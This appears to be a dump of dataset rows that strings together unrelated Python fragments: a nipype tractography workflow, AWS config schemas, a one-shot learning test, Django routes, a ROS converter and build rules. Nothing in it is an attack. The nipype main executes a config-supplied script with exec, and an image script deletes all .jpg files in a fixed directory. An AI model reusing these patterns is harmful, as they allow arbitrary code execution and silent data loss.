outfields=['dwi','mask','bvecs','bvals',"reg","mean"]),
name='datasource')
# create a node to obtain the functional images
datasource.inputs.base_directory = c.sink_dir
datasource.inputs.template ='*'
datasource.inputs.field_template = dict(dwi='%s/preproc/outputs/dwi/*',
mask='%s/preproc/outputs/mask/*', bvecs='%s/preproc/outputs/bvecs/*',
bvals='%s/preproc/outputs/bvals/*',reg='%s/preproc/outputs/bbreg/*.dat',
mean='%s/preproc/outputs/mean/*.nii*')
datasource.inputs.template_args = dict(dwi=[['subject_id']],
mask=[['subject_id']],
bvecs=[['subject_id']],
bvals=[['subject_id']],
mean=[["subject_id"]],
reg=[["subject_id"]])
return datasource
foo = pconfig()
def get_wf(c, prep_c=foo):
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
import nipype.interfaces.utility as niu
workflow = create_workflow()
datagrabber = get_dataflow(prep_c)
inputspec = workflow.get_node('inputspec')
workflow.connect(datagrabber,'mask',inputspec,'mask')
workflow.connect(datagrabber,'dwi',inputspec,'dwi')
workflow.connect(datagrabber,'bvecs',inputspec,'bvecs')
workflow.connect(datagrabber,'bvals',inputspec,'bvals')
workflow.connect(datagrabber,'reg',inputspec,'reg')
workflow.connect(datagrabber,'mean',inputspec,'mean')
workflow.inputs.inputspec.surf_dir=prep_c.surf_dir
infosource = pe.Node(niu.IdentityInterface(fields=["subject_id"]),name='subject_names')
workflow.connect(infosource,"subject_id",datagrabber, 'subject_id')
workflow.connect(infosource,"subject_id",inputspec, 'subject_id')
sinker = pe.Node(nio.DataSink(),name='sinker')
outputspec=workflow.get_node('outputspec')
workflow.connect(outputspec,'fdt_paths',sinker,'track.fdt_paths')
workflow.connect(outputspec,'log',sinker,'track.log')
workflow.connect(outputspec,'particle_files',sinker,'track.particle_files')
workflow.connect(outputspec,'targets',sinker,'track.targets')
workflow.connect(outputspec,'way_total',sinker,'track.way_total')
sinker.inputs.base_directory=c.sink_dir
workflow.connect(infosource,"subject_id",sinker,"container")
if c.test_mode:
infosource.iterables=("subject_id", [c.subjects[0]])
else:
infosource.iterables=("subject_id", c.subjects)
workflow.base_dir = c.working_dir
return workflow
mwf.workflow_function = get_wf
"""
Part 5: Main
"""
def main(config_file):
c = load_config(config_file,config)
prep_c = load_config(c.preproc_config, pconfig)
workflow = get_wf(c,prep_c)
if c.use_advanced_options:
exec c.advanced_script
if c.test_mode:
workflow.write_graph()
if c.run_using_plugin:
workflow.run(plugin=c.plugin, plugin_args=c.plugin_args)
else:
workflow.run()
return 1
mwf.workflow_main_function = main
"""
Part 6: Main
"""
register_workflow(mwf)
| StarcoderdataPython |
14118 | from marshmallow import fields, Schema
from .provision import ProvisionActionSchema
class InstanceSchema(Schema):
type = fields.String(required=True)
image_id = fields.String(required=True)
availability_zone = fields.String(required=True)
ebs_optimized = fields.Boolean()
iam_fleet_role = fields.String(required=True)
class Meta:
ordered = True
class AuthSchema(Schema):
key_pair_name = fields.String(required=True)
identity_file = fields.String(required=True)
user = fields.String(required=True)
group = fields.String(required=True)
class Meta:
ordered = True
class NetworkSchema(Schema):
security_group_id = fields.String(required=True)
subnet_id = fields.String()
class Meta:
ordered = True
class ComputeAwsSchema(Schema):
provider = fields.String(required=True)
instance = fields.Nested(InstanceSchema, required=True)
auth = fields.Nested(AuthSchema, required=True)
network = fields.Nested(NetworkSchema, required=True)
provision_actions = fields.Nested(ProvisionActionSchema, many=True)
class Meta:
ordered = True
| StarcoderdataPython |
3372671 | """Test unimodal vision and speech models on Flickr one-shot multimodal task.
Author: <NAME>
Contact: <EMAIL>
Date: October 2019
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
from moonshot.baselines import dataset
from moonshot.baselines import experiment
from moonshot.experiments.flickr_multimodal import flickr_multimodal
from moonshot.utils import file_io
from moonshot.utils import logging as logging_utils
FLAGS = flags.FLAGS
# one-shot evaluation options
flags.DEFINE_integer("episodes", 400, "number of L-way K-shot learning episodes")
flags.DEFINE_integer("L", 10, "number of classes to sample in a task episode (L-way)")
flags.DEFINE_integer("K", 1, "number of task learning samples per class (K-shot)")
flags.DEFINE_integer("N", 15, "number of task evaluation samples")
flags.DEFINE_integer("k_neighbours", 1, "number of nearest neighbours to consider")
flags.DEFINE_string("metric", "cosine", "distance metric to use for nearest neighbours matching")
flags.DEFINE_enum("speaker_mode", "baseline", ["baseline", "difficult", "distractor"],
"type of speakers selected in a task episode")
flags.DEFINE_bool("unseen_match_set", False, "match set contains classes unseen in K-shot learning")
flags.DEFINE_integer("seed", 42, "that magic number")
# speech features
flags.DEFINE_string("vision_base_dir", None, "directory containing base vision network model")
flags.DEFINE_string("audio_base_dir", None, "directory containing base audio network model")
# logging options
flags.DEFINE_string("output_dir", None, "directory where logs will be stored"
"(defaults to logs/<unique run id>)")
flags.DEFINE_bool("debug", False, "log with debug verbosity level")
def data_preprocess_func(embed_paths):
"""Data batch preprocessing function for input to the baseline model.
Takes a batch of file paths, loads image data and preprocesses the images.
"""
embed_ds = tf.data.TFRecordDataset(
embed_paths, compression_type="ZLIB")
# map sequential to prevent optimization overhead
preprocess_func = lambda example: dataset.parse_embedding_protobuf(
example)["embed"]
embed_ds = embed_ds.map(preprocess_func, num_parallel_calls=8)
return np.stack(list(embed_ds))
def test():
"""Test extracted image and speech model embeddings for one-shot learning."""
# load embeddings from (linear) dense layer of base speech and vision models
speech_embed_dir = os.path.join(FLAGS.audio_base_dir, "embed", "dense")
image_embed_dir = os.path.join(FLAGS.vision_base_dir, "embed", "dense")
# load Flickr Audio one-shot experiment
one_shot_exp = flickr_multimodal.FlickrMultimodal(
features="mfcc", keywords_split="one_shot_evaluation",
flickr8k_image_dir=os.path.join("data", "external", "flickr8k_images"),
speech_embed_dir=speech_embed_dir, image_embed_dir=image_embed_dir,
speech_preprocess_func=data_preprocess_func,
image_preprocess_func=data_preprocess_func,
speaker_mode=FLAGS.speaker_mode,
unseen_match_set=FLAGS.unseen_match_set)
# test model on L-way K-shot task
task_accuracy, _, conf_interval_95 = experiment.test_multimodal_l_way_k_shot(
one_shot_exp, FLAGS.K, FLAGS.L, n=FLAGS.N, num_episodes=FLAGS.episodes,
k_neighbours=FLAGS.k_neighbours, metric=FLAGS.metric)
logging.log(
logging.INFO,
f"{FLAGS.L}-way {FLAGS.K}-shot accuracy after {FLAGS.episodes} "
f"episodes: {task_accuracy:.3%} +- {conf_interval_95*100:.4f}")
def main(argv):
del argv # unused
logging.log(logging.INFO, "Logging application {}".format(__file__))
if FLAGS.debug:
logging.set_verbosity(logging.DEBUG)
logging.log(logging.DEBUG, "Running in debug mode")
physical_devices = tf.config.experimental.list_physical_devices("GPU")
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# create output directory if none specified
if FLAGS.output_dir is None:
output_dir = os.path.join(
"logs", __file__, datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
file_io.check_create_dir(output_dir)
# output directory specified, load model options if found
else:
output_dir = FLAGS.output_dir
# print flag options
flag_options = {}
for flag in FLAGS.get_key_flags_for_module(__file__):
flag_options[flag.name] = flag.value
# logging
logging_utils.absl_file_logger(output_dir, f"log.test")
logging.log(logging.INFO, f"Model directory: {output_dir}")
logging.log(logging.INFO, f"Flag options: {flag_options}")
# set seeds for reproducibility
np.random.seed(FLAGS.seed)
tf.random.set_seed(FLAGS.seed)
# test baseline matching model (no background training step)
test()
if __name__ == "__main__":
app.run(main)
| StarcoderdataPython |
91692 | #!/usr/bin/python3
import subprocess, os
import re
def get_output(cmd):
my_env = os.environ.copy()
if(variant == 'windows'):
my_env['PKG_CONFIG_PATH'] = '/tmp/gtk_download_test/lib/pkgconfig'
p = subprocess.Popen(cmd, env = my_env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return list(map(lambda x: str(x, 'utf8'), filter(len, re.compile(b'\s+').split(out))))
@GenRuleFunc
def pkg_config(name):
rule = GenRule(name)
rule.meta.cc_system_so_flags.add_all(get_output(['pkg-config', name, '--libs']))
rule.meta.dep_cc_flags.add_all(get_output(['pkg-config', name, '--cflags']))
return rule
@GenRuleFunc
def cc_lflags(name, lflags = []):
rule = GenRule(name)
rule.meta.cc_system_so_flags.add_all(lflags)
return rule
@GenRuleFunc
def cc_a_library(name, libname, cflags = []):
rule = GenRule(name)
rule.inp.cc_a_lib.add(libname)
rule.out.cc_a_lib.depends_on(rule.inp.cc_a_lib)
rule.meta.dep_cc_flags.add_all(cflags)
return rule
| StarcoderdataPython |
128184 | from .exceptions import BaseSnappyError, CorruptError, TooLargeError # noqa: F401
from .main import compress, decompress # noqa: F401
| StarcoderdataPython |
1793256 | <reponame>Devil-619/pymovies-project<gh_stars>0
from django.urls import path
from .views import MovieListView, GenreMovieListView, MovieSearchResult, WatchListView, RecommendListView
from . import views
urlpatterns = [
path('', MovieListView.as_view(), name='movie-home'),
path('genre/<str:genre>/', GenreMovieListView.as_view(), name='movie-genre'),
path('movie/<str:title>/', views.MovieDetail, name='movie-detail'),
path('watchlist/<str:username>/', WatchListView.as_view(), name='user-watchlist'),
path('recommendations/<str:username>/', RecommendListView.as_view(), name='user-recommend'),
path('search/', views.MovieSearch, name='movie-search'),
path('search-results/<str:title>/', MovieSearchResult.as_view(), name='movie-search-result'),
path('about/', views.about, name='movie-about'),
]
| StarcoderdataPython |
23770 | #!/usr/bin/env python
# convert jpg tp png
from glob import glob
import cv2
pngs = glob('./*.jpg')
for j in pngs:
img = cv2.imread(j)
cv2.imwrite(j[:-3] + 'png', img)
# delete jpg files
import glob
import os
dir = "/Users/wangmeijie/ALLImportantProjects/FlameDetectionAPP/Models/MaskRCNN/02_26_2020/Mask_RCNN/dataset/train"
for jpgpath in glob.iglob(os.path.join(dir, '*.jpg')):
os.remove(jpgpath) | StarcoderdataPython |
3227842 | <reponame>SaidAlvarado/Cygnus_Quadcopter
#!/usr/bin/env python
# Script that listen to a Geometry Pose Message, transforms it into a Euler rotation, ans publishes it as a
# Vector3 message. with x = ROLL, y = PITCH and z = YaW.
# Reference = http://answers.ros.org/question/69754/quaternion-transformations-in-python/
import rospy
import tf
import math
# Import the float array message
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Vector3
# Function callback used when a quaternion is received
def callback(data):
global pub
if not rospy.is_shutdown():
rospy.loginfo(data)
# Use TF to convert the quaternion to euler, the publish it
euler_msg = Vector3();
quaternion = (
data.orientation.x,
data.orientation.y,
data.orientation.z,
data.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
euler_msg.x = euler[0]*180/math.pi
euler_msg.y = euler[1]*180/math.pi
euler_msg.z = euler[2]*180/math.pi
# publish the euler vetor as ROLL, PITH, YAW.
pub.publish(euler_msg)
if __name__ == "__main__":
try:
pub = rospy.Publisher('teensy_euler', Vector3, queue_size=10)
rospy.init_node("quaternion2euler", anonymous = True)
rospy.Subscriber("quadcopter_pose", Pose, callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
| StarcoderdataPython |
3381711 | class NotSupportedException(Exception):
def __init__(self, message):
super(NotSupportedException, self).__init__(message) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.